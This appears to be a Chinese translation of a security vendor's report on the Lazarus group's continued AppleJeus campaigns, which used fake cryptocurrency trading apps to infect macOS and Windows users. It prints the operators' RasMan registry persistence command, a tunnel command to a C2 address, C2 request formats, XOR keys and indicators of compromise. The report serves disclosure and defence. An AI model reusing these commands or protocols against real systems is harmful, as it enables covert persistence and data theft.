Lazarus组织仍旧紧盯加密货币:AppleJeus后续行动介绍 - 嘶吼 RoarTalk – 回归最本质的信息安全,互联网安全新媒体,4hou.com

Lazarus组织仍旧紧盯加密货币:AppleJeus后续行动介绍

Change 加密货币 2020-01-22 10:17:54
收藏

导语:Lazarus组织是当前最为活跃的APT组织之一,常常出现在各类金融网络犯罪案件中。

Lazarus组织是当前最为活跃的APT组织之一,常常出现在各类金融网络犯罪案件中。据网络安全公司Group-IB的《2018年高科技网络犯罪趋势报告》显示,从2017年至2018年9月,全球有14起成功地针对加密货币交易中心的攻击事件,黑客总共盗走了8.82亿美元的加密货币,而这其中有64.7%、价值5.71亿美元的加密货币都被Lazarus一家拿走。

2018年,Lazarus为了更一步拓展加密货币的盗窃范围,开始将攻击网撒向macOS用户,此行动也被称作``AppleJeus行动''。他们通过自制的macOS恶意软件植入受害者机器中,木马初始是无害的,后续从后台收集系统数据,进而判定是否要对系统目标展开攻击。一旦条件符合,木马就会打开“更新程序”,将恶意代码安装到设备端。

更新会安装一些新模块,比如Lazarus的武器之一——“Fallchill Trojan”木马。Fallichill能够让攻击者获得计算机的无限访问权限,再之后终端上的比特币等加密货币目标,就会成为攻击者的“囊中之物”。

此外,为了攻击Windows用户,Lazarus制定了多阶段感染程序,并对最终负载做了很多修改。在卡巴斯基对AppleJeus行动曝光后,Lazarus在进行攻击时变得更加谨慎,采用了许多方法来避免被发现。

AppleJeus行动后续

AppleJeus行动曝光后,Lazarus组织仍然保持了类似的作案手法,许多案例中使用的macOS恶意软件都类似,它是一个由公开源码构建的macOS安装程序,作者利用了Centrabit开发的QtBitcoinTrader

image.png

这三类macOS安装程序都使用类似的安装后脚本程序来植入mach-o负载,执行第二阶段负载时使用的命令行参数也相同,但macOS恶意软件在发生着变化,新的macOS恶意软件被称为MarkMakingBot.dmg(be37637d8f6c1fbe7f3ffc702afdfe1d),于2019-03-12创建。它没有用于网络通信的加密/解密例程,因此我们推测这可能只是一个中继阶段的测试版本。

Windows恶意软件的变化

2019年3月,在一起针对Windows用户的AppleJeus案件中,攻击者使用了名为WFCUpdater.exe的初始感染文件和wfcwallet [.] com的伪造网站。

 

图1. WFC案例中使用的二进制感染程序

感染过程同以往一样,也是多阶段感染,但方法不同。此次感染始于一个伪装成WFC钱包更新程序的.NET恶意软件(a9e960948fdac81579d3b752e49aceda)。执行后,.NET文件检查命令行参数是否为“ / Embedding”。恶意软件使用硬编码的20字节XOR密钥(82 d7 ae 9b 36 7d fc ee 41 65 8f fa 74 cd 2c 62 b7 59 f5 62)解密同一文件夹中的WFC.cfg文件,此文件模仿了连接到C2地址的钱包更新程序:

wfcwallet.com(解析的IP:108.174.195.134)

www.chainfun365.com(解析的IP:23.254.217.53)

之后,恶意软件执行操作人员指令,以安装下一阶段的永久负载。执行者向受害者的系统文件夹中提交了另外两个文件:rasext.dll和msctfp.dat,使用RasMan(远程访问连接管理器)Windows服务保证持久性机制。经过基本侦察后,操作人员使用以下命令手动植入负载:

cmd.exe /c dir rasext.dll
cmd.exe /c dir msctfp.dat
cmd.exe /c tasklist /svc | findstr RasMan
cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RasMan\ThirdParty /v DllName /d rasext.dll /f

为了建立远程隧道,攻击者使用了很多工具,并通过命令行参数来执行。虽然没有实际证据,但我们推测Device.exe负责打开端口6378,而centerupdate .exe工具用于创建到远程主机的隧道。注意,104.168.167.16服务器用作C2服务器。下面将介绍UnionCryptoTrader案例的假网站托管服务器。

端口开启:

%APPDATA%\Lenovo\devicecenter\Device.exe 6378

隧道工具:

%APPDATA%\Lenovo\devicecenter\CenterUpdater.exe 127.0.0.1 6378 104.168.167.16 443

macOS恶意软件的变化

· JMTTrading

此次行动中,攻击者将其假网站和应用程序称为JMTTrading,使用的macOS恶意软件也发生了很大变化,技术细节请参见Object-See发布的相关博文。我们想强调的是此次攻击的差异之处:

· 攻击者使用GitHub来托管恶意应用程序。

· 恶意软件作者在其macOS恶意软件中使用了Object-C而不是QT框架。

· macOS可执行文件中实现了简单的后门功能。

· 与之前类似,恶意软件使用一个16字节的XOR密钥(X,% ' PMk-Jj8s +6=)进行加密/解密。

· 该恶意软件的Windows版本使用ADVobfuscator(一种编译时间混淆器)来隐藏其代码。

· macOS恶意软件的安装后脚本与以前的版本有很大的不同。

· UnionCryptoTrader

UnionCryptoTrader是近期一期针对macOS的攻击案例。技术细节请参见Objective-See博文。我们对此次攻击总结如下:

· 安装后的脚本与JMTTrading案例中使用的脚本相同。

· 恶意软件作者使用SWIFT开发macOS恶意软件。

· 恶意软件作者改变了从受感染系统收集信息的方法。

该恶意软件开始使用auth_signature和auth_timestamp参数进行身份验证,以便更仔细地传递第二阶段负载。恶意软件能获取当前系统时间,并将其与“ 12GWAPCT1F0I1S14”硬编码字符串组合,产生组合字符串的MD5哈希值。该哈希值用作auth_signature参数的值,而当前时间用作auth_timestamp参数的值。恶意软件操作员可以基于C2服务器端的auth_timestamp来复制auth_signature值。

该恶意软件无需接触磁盘即可加载下一阶段的负载。

Windows版本的UnionCryptoTrader

Windows版本的UnionCryptoTrader(0f03ec3487578cef2398b5b732631fec)从Telegram Messenger下载文件夹执行:

C:\Users\[user name]\Downloads\Telegram Desktop\UnionCryptoTraderSetup.exe

我们还在假网站上找到了攻击者的Telegram小组,因此可以认为攻击者使用Telegram Messenger发送安装程序。根据遥测技术重组的感染过程与WFCWallet案例非常相似,但是增加了注入过程,而且攻击者只使用了最后的后门负载,而没有使用隧道工具。

 

图2.二进制感染程序

Windows版本的UnionCryptoTrader具有以下窗口,显示几个加密货币交易的价格图表。

 

图3 .Windows版本的UnionCryptoTrader

Windows版本的UnionCryptoTrader更新程序(629b9de3e4b84b4a0aa605a3e9471b31)具有与macOS版本相似的功能。根据构建路径(Z:\ Loader \ x64 \ Release \ WinloaderExe.pdb)可以看出,作者将此恶意软件称为加载程序。启动后,该恶意软件会检索受害者的基本系统信息,并以以下HTTP POST格式发送该信息,就像macOS恶意软件一样。

POST /update HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
auth_timestamp: [Current time]
auth_signature: [Generated MD5 value based on current time]
Content-Length: 110
Host: unioncrypto.vip
rlz=[BIOS serial number]&ei=[OS version]  ([build number])&act=check

如果C2服务器的响应代码为200,则恶意软件会解密负载并将其加载到内存中。最后,恶意软件发送act = done值并返回代码。从这个加载器下载的下一个阶段负载(e1953fa319cc11c2f003ad0542bca822)类似于WFCWallet中的. net下载器。恶意软件负责解密同一文件夹中的Adobe.icx文件,将下一个负载注入Internet Explorer进程,受污染的iexplore.exe进程执行攻击者的命令。最终的负载(dd03c6eb62c9bf9adaf831f1d7adcbab)与WFCWallet情况一样,是手动植入的,且仅在某些系统上运行。

看来恶意软件作者根据先前收集的信息,生产了仅在特定系统上有效的恶意软件。该恶意软件会检查受感染系统的信息,并将其与给定值进行比较。攻击者在执行最终负载时显得小心翼翼,想逃避基于行为的检测解决方案的检测。

 

图4.恶意软件执行流程

该Windows恶意软件将加密的msctfp.dat文件加载到系统文件夹中,加载每个配置值,然后将基于此文件的内容执行附加命令。当恶意软件与C2服务器通信时,它使用带有几个预定义头的POST请求。

POST /[C2 script URL] HTTP/1.1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive or Connection: close
User-Agent: [User-agent of current system]
Host: unioncrypto.vip

对于初始通信,恶意软件首先发送参数:

· cgu:配置中的64位十六进制值

· aip:配置中的MD5哈希值

· sv:硬编码值(1)

如果来自C2服务器的响应代码是200,则恶意软件将发送下一个POST请求,带有加密数据和随机值。操作人员可能使用随机值来识别每个受害者并验证POST请求。

· imp:随机产生的值

· dsh:imp的异或值

· hb_tp:imp的异或值(key:0x67BF32)

· hb_dl:加密的数据发送到C2服务器

· ct:硬编码值(1)

最终,恶意软件下载下一阶段负载,将其解密并可能使用Print参数执行。我们推测DLL类型的有效载荷将被下载,并调用其Print输出函数进一步感染。我们无法获得在内存中执行的最终负载,但我们相信其后门型恶意软件最终会被用来控制受感染的受害者。

基础设施

在调查其基础架构时发现了几个仍在线的假冒网站,以加密货币为主题,但这些网站的细节还不够完美,而且大多数链接都无效。

 

图5 .cyptian.com网站

 

图6. unioncrypto.vip网站

我们在网上找到了cyptian.comd 网页模板,推测攻击者使用的是此类免费网络模板来构建网站的。此外,在Cyptian网站上还有一个Telegram 地址(@cyptian)。如前所述,攻击者通过Telegram Messenger发送了安装应用程序。当我们进行调查时,该Telegram地址仍然有效,但活动暂停了。根据聊天记录,该群组于2018年12月17日创建,一些帐户已被删除。

 

图7.Telegram帐户

结论

在AppleJeus后续行动中分布的受害者分别来自英国、波兰、俄罗斯和中国,均与加密货币业务实体有关。

 

图8.感染图

Lazarus组织还在不断调整着其恶意软件的macOS和Windows版本——在macOS下载器中添加了身份验证机制并更改了macOS开发框架,而Windows系统中的二进制感染过程与以往不同,Windows最终负载也发生了变化。我们认为,Lazarus组织在之后也会出于经济利益目的而展开持续的攻击行动。

图9 .AppleJeus行动时间表

自AppleJeus行动首次面世以来,我们可以看到,随着时间的流逝,攻击者已经大大改变了他们的作案手法。我们认为,这种针对加密货币业务的攻击将继续下去,并变得更加复杂。

附录:威胁指标

哈希

· macOS恶意软件

c2ffbf7f2f98c73b98198b4937119a18 MacInstaller.dmg

8b4c532f10603a8e199aa4281384764e BitcoinTrader.pkg

bb04d77bda3ae9c9c3b6347f7aef19ac .loader

3efeccfc6daf0bf99dcb36f247364052 4_5983241673595946132.dmg

cb56955b70c87767dee81e23503086c3 WbBot.pkg

b63e8d4277b190e2e3f5236f07f89eee .loader

be37637d8f6c1fbe7f3ffc702afdfe1d MarkMakingBot.dmg

bb66ab2db0bad88ac6b829085164cbbb BitcoinTrader.pkg

267a64ed23336b4a3315550c74803611 .loader

6588d262529dc372c400bef8478c2eec UnionCryptoTrader.dmg

55ec67fa6572e65eae822c0b90dc8216 UnionCryptoTrader.pkg

da17802bc8d3eca26b7752e93f33034b .unioncryptoupdater

39cdf04be2ed479e0b4489ff37f95bbe JMTTrader_Mac.dmg

e35b15b2c8bb9eda8bc4021accf7038d JMTTrader.pkg

6058368894f25b7bc8dd53d3a82d9146 .CrashReporter

· Windows恶意软件

a9e960948fdac81579d3b752e49aceda WFCUpdater.exe

24B3614D5C5E53E40B42B4E057001770 UnionCryptoTraderSetup.exe

629B9DE3E4B84B4A0AA605A3E9471B31 UnionCryptoUpdater.exe

E1953FA319CC11C2F003AD0542BCA822 AdobeUpdator.exe, AdobeARM.exe

f221349437f2f6707ecb2a75c3f39145 rasext.dll

055829E7600DBDAE9F381F83F8E4FF36 UnionCryptoTraderSetup.exe

F051A18F79736799AC66F4EF7B28594B Unistore.exe

文件路径

%SYSTEM%\system32\rasext.dll

%SYSTEM%\system32\msctfp.dat

%APPDATA%\Lenovo\devicecenter\Device.exe

%APPDATA%\Lenovo\devicecenter\CenterUpdater.exe

%APPDATA%\Local\unioncryptotrader\UnionCryptoUpdater.exe

$APPDATA%\adobe\AdobeUpdator.exe

C:\Programdata\adobe\adobeupdator.exe

%AppData%\Local\Comms\Unistore.exe

域名和IP

· 域名

www.wb-bot.org

www.jmttrading.org

cyptian.com

beastgoc.com

www.private-kurier.com

www.wb-invest.net

wfcwallet.com

chainfun365.com

www.buckfast-zucht.de

invesuccess.com

private-kurier.com

aeroplans.info

mydealoman.com

unioncrypto.vip

· IPs

104.168.167.16

23.254.217.53

185.243.115.17

104.168.218.42

95.213.232.170

108.174.195.134

185.228.83.32

172.81.135.194

· URLs

https://www.wb-bot[.]org/certpkg.php

http://95.213.232[.]170/ProbActive/index.do

http://beastgoc[.]com/grepmonux.php

https://unioncrypto[.]vip/update

本文翻译自:https://securelist.com/operation-applejeus-sequel/95596/如若转载,请注明原文地址
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论